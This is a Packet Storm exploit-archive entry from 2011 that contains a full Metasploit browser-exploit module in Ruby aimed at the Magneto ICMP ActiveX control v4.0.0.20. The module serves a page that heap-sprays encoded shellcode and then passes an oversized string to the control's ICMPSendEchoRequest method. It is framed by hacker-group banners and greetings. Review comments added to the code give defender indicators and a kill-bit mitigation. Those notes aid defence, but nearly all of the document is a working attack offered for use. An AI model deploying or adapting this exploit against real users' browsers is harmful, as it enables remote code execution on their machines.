packetstormKedAns-DzPACKETSTORM:102122
HistoryJun 09, 2011 - 12:00 a.m.

Magneto ICMP ActiveX 4.0.0.20 ICMPSendEchoRequest Remote Code Execution

2011-06-0900:00:00
KedAns-Dz
packetstormsecurity.com
21
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : Magneto ICMP ActiveX v4.0 (SendEchoRequest) Remote Code Execute (meta)  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com  
# Twitter page : twitter.com/kedans  
# platform : windows  
# Impact : Remote Code Execution (via Metasploit 3)  
# Tested on : [Windows XP SP3 Fr]  
##  
# Download : [http://www.magnetosoft.com/downloads/skicmp_setup.exe]  
##  
# $Id: $ micmp_ocx_rce.rb | 08/06/2011 00:34 | KedAns-Dz $  
###  
  
require 'msf/core'  
  
# Metasploit browser-exploit module for the Magneto ICMP ActiveX control
# (v4.0.0.20 per the metadata below). It serves an HTML page that instantiates
# the control by CLSID and calls its ICMPSendEchoRequest method with a string
# of at least 6000 characters.
# NOTE(review): the page does not state the bug class; the long argument
# suggests a memory-corruption flaw in that method -- confirm against the
# referenced advisory.
#
# Defender notes:
# - Stable indicators in the served page are the CLSID
#   3A86F1F2-4921-4C75-AF2C-A1AA241E12BA, the method name ICMPSendEchoRequest
#   and the unescape("%u0c0c%u0c0c") spray seed; the <object> id is random.
# - Setting the Internet Explorer kill bit for that CLSID (Compatibility Flags
#   0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID})
#   or unregistering the OCX stops web pages from instantiating the control.
# - The only reference given is exploit-db 17328; no CVE or vendor fix is
#   cited here, so patch status cannot be determined from this listing.
class Metasploit3 < Msf::Exploit::Remote  
# Reliability rank the author assigned to the module.
Rank = GoodRanking  
  
# HTTP-server mixin: the module waits for a browser to request its page
# (client-side delivery) and provides send_response_html used below.
include Msf::Exploit::Remote::HttpServer::HTML  
  
# Registers the module's metadata with the framework.
# info: hash supplied by the framework, merged with the values below.
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Magneto ICMP ActiveX v4.0.0.20 ICMPSendEchoRequest Remote Code Execute',  
'Description' => %q{  
This module exploits a Remote Code Execute in Magneto ICMP ActiveX Control (OCX)  
Vesion v4.0.0.20 , an attacker may be able to execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' =>   
[  
'boahat', # credited as the original finder/author
'KedAns-Dz <ked-h[at]hotmail.com>' # author of this Metasploit module
],  
# NOTE(review): free-form version string, not a revision id.
'Version' => 'Version 1.0',  
# Only public reference listed; no CVE/OSVDB/vendor advisory is given.
'References' =>  
[  
[ 'URL', 'http://exploit-db.com/exploits/17328' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
# Payload constraints handed to the framework's encoder: size limit,
# bytes that must not appear, and an alphanumeric encoder keyed to ESI.
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x09\x0a\x0d'\\",  
'StackAdjustment' => -3500,  
# NOTE(review): the value is the String 'True', not the boolean true;
# confirm how the framework interprets it.
'DisableNops' => 'True',  
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,  
'EncoderOptions' =>  
{  
'BufferRegister' => 'ESI',  
}  
},  
'Platform' => 'win',  
# Single target; its 'ret' value is an empty string and is never read
# anywhere in this class.
'Targets' =>  
[  
[ 'Windows XP SP3 (Fr) / IE7', { 'ret' => '' } ],  
],  
'DefaultTarget' => 0))  
end  
  
  
# Builds and returns the HTML page for one HTTP request.
# cli:     the connected client (used for logging, the response and the handler).
# request: the incoming request; it is not inspected, so every requester
#          receives the same page regardless of browser or platform.
def on_request_uri(cli, request)  
  
clsID = "3A86F1F2-4921-4C75-AF2C-A1AA241E12BA" # CLSID of the targeted ActiveX control (fixed; usable as a detection indicator)
vname = rand_text_alpha_upper(11) # random 11-letter id for the <object> element; differs per response
shell = payload.encoded # encoded payload produced by the framework
  
# HTML/JavaScript template. The script (1) grows strings seeded with
# unescape("%u0c0c%u0c0c") and stores 500 copies of block + shellcode in an
# array (a heap spray), then (2) builds a string of at least 6000 characters
# and passes it to the control's ICMPSendEchoRequest method.
# Because this is a %Q literal, Ruby expands "\x0c" and the #{...}
# interpolations before the page is sent.
content = %Q|<html>  
<body>  
<object classid="clsid:#{clsID}" id="#{vname}"></object>  
<script>  
var shellcode = "#{shell}";  
  
var bigblock = unescape("%u0c0c%u0c0c");  
var headersize = 20;  
var slackspace = headersize+shellcode.length;  
while (bigblock.length<slackspace)  
bigblock+=bigblock;  
  
fillblock = bigblock.substring(0, slackspace);  
block = bigblock.substring(0, bigblock.length-slackspace);  
while(block.length+slackspace<0x40000)  
block = block+block+fillblock;  
  
memory = new Array();  
for (x=0; x<500; x++)  
memory[x] = block + shellcode;  
  
var buffer = '';   
while (buffer.length < 6000)  
buffer+= "\x0c\x0c\x0c\x0c";  
#{vname}.ICMPSendEchoRequest(buffer);  
</script>  
</body>  
</html>  
|  
  
# Logs the requesting client's address and port on the operator console.
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Sends the page as text/html with a 'Pragma: no-cache' header.
send_response_html(cli, content, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })  
  
# Hands the client to the framework's payload handler.
handler(cli)  
end  
  
end  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu  
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)  
# JaGo-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...  
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-  
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever   
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm  
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz  
#================================================================================================`